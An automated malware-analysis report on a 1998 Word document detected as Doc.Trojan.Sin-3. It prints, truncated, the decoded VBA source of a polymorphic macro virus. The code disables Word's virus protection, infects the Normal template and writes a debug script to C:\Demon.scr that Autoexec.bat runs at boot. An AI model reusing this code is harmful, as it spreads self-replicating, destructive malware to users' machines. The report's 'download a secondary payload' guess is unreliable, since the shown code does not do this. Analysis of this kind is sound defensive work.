Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 362ad1f2e918b10b…

MALICIOUS

Office (OLE)

261.5 KB Created: 1998-10-11 13:46:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 30bf89542a2628a482c01f1116dab785 SHA-1: 9b4b81f37b41f5268fa4f4977cf601839cdb8027 SHA-256: 362ad1f2e918b10b4fba3abb04bf1070f5ff96aca0ea4c80c30ef027103e379c
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains a VBA macro that executes when the document is opened, as indicated by the 'Document_Open' macro firing. This macro attempts to write a script to 'C:\Demon.scr' and append commands to 'C:\Autoexec.bat', likely to download and execute a secondary payload. The ClamAV detection 'Doc.Trojan.Sin-3' further supports its malicious nature.

Heuristics 3

  • ClamAV: Doc.Trojan.Sin-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Sin-3
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 15913 bytes
SHA-256: 197c97faa405d421de27f33bd9dba3369ed04b897629704719da13a2e2f9a135
Detection
ClamAV: Doc.Trojan.Sin-3
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
On Error Resume Next
ICheck = True
PRSWDDVQXO:          Options.VirusProtection = False
QFEHHO:          Randomize Timer
PJINRABRK:           ActInstalled = False
JVTEXSBBO:          Set ActCarrier = ActiveDocument.VBProject.VBComponents(1).CodeModule
COCJDH:          Set NormCarrier = NormalTemplate.VBProject.VBComponents(1).CodeModule
DNDMIXDBGS:
NCSEFPU:          NI = NormalTemplate.VBProject.VBComponents(1).CodeModule.Lines(3, 1)
MDKFFRP:          AI = ActiveDocument.VBProject.VBComponents(1).CodeModule.Lines(3, 1)
EPYVTAIMGWX:
SJXEXX:          If UCase(NI) = "ICHECK = TRUE" Then NormInstalled = True
GTLVMKUDNPJ:          If UCase(AI) = "ICHECK = TRUE" Then ActInstalled = True
KEHVNSE:
XUFXDXFCO:          If NormInstalled = False Then
DIAOTPT:              Set Infection = NormCarrier
SNFFNPQEG:              Set Carrier = ActCarrier
KGBUFG:          Else
GQDGXBR:              Set Infection = ActCarrier
FPDAXRGSU:              Set Carrier = NormCarrier
QOPHEKXS:          End If
ACXORCSXWH:
CFVEBOO:          If NormInstalled = True And ActInstalled = True Then
HSHEKWAAFSR:              If Int(Rnd * 24) > CInt(Hour(Time)) Then
XMBTVRUNT:              IAddressI = Int(Rnd * 9999): Open "C:\Demon.scr" For Output As #1
YWOXNWTU:              Print #1, "w " & IAddressI & " 02 01 02": Open "C:\Autoexec.bat" For Append As #2
ATRHTYWP:              Print #1, "q"
JBPEEWNJ:              Print #2, "debug <demon.scr"
CPFGMR:              Close
COMVWFYSS:              End If
AIYYDGOH:          End If
PBPGJG:
VXVHGXTDCH:          With Carrier
DHSFYUAVPKC:          UECode1 = .Lines(1, 1) & Chr(13)
JDCCBCLMOTV:          UECode2 = .Lines(2, 1) & Chr(13)
HKQPMOI:          UECode3 = .Lines(3, 1) & Chr(13)
YAOFDXXF:          UECode = UECode1 & UECode2 & UECode3
FQMFGS:          For X = 5 To .CountOfLines - 1
QSHTNQCRXAK:              VCCode = .Lines(X, 1)
NFDUEAATV:              If VCCode = "End Sub" Then Exit For
HNXINGRSS:              For I = 1 To 20
TYMDLUVXOUV:                  If Mid(VCCode, I, 1) = ":" Then VCCode = Right(VCCode, Len(VCCode) - I)
EHVSCARXAGG:              Next I
MMLFSTFP:              factor = ""
QTOHLGMQOQI:              For Y = 1 To Int(Rnd * 6) + 6
DQSETFS:                  factor = factor & Chr(Int(Rnd * 25) + 65)
BXGFNALFQ:              Next Y
QIMSFYXM:              make_morph = factor & ": "
OCKCWXRGUD:
EHHMRKF:              VirCode = VirCode & make_morph & " " & VCCode & Chr(13)
YCSHNNHAAIM:          Next X
MRDUETBCWL:          VirCode = UECode & VirCode & "End Sub"
MIGGCFOITVF:          End With
FUWVJAI:
ABMNNOWS:          With Infection
DKROFG:              .DeleteLines 1, .CountOfLines
XKCQGBN:              .InsertLines 1, VirCode
FXUXJGVB:          End With
YIYFIDGQN:
LEUHNDS:          StealthModul = "by Lord Arz"
YAQXONMT:          ResetMe = "Private Sub Document_Close()" & Chr(13)
RTVORVPI:          ResetMe = ResetMe & "Beginn:                                                                                                                                                                                                                                                        If ShowVisualBasicEditor = True Then Normal.ThisDocument.Variables(" & Chr(34) & "VCode" & Chr(34) & ").Value = (" & Chr(34) & "Msgbox " & Chr(34) & Chr(34) & "Seven deadly sins, seven ways to win, seven holy path to hell, seven downward slopes, seven blodied hopes, seven are your burnig fires, seven your desires...." & Chr(34) & ")" & Chr(13)
NKWEQDXWG:          ResetMe = ResetMe & "With ThisDocument.VBProject.VBComponents(1).CodeModule" & Chr(13)
JUTTASR:          ResetMe = ResetMe & ".DeleteLines 1, .CountOfLines" & Chr(13)
AGABUAO:          ResetMe = ResetMe & ".InsertLines 1, ThisDocument.Variables(1
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.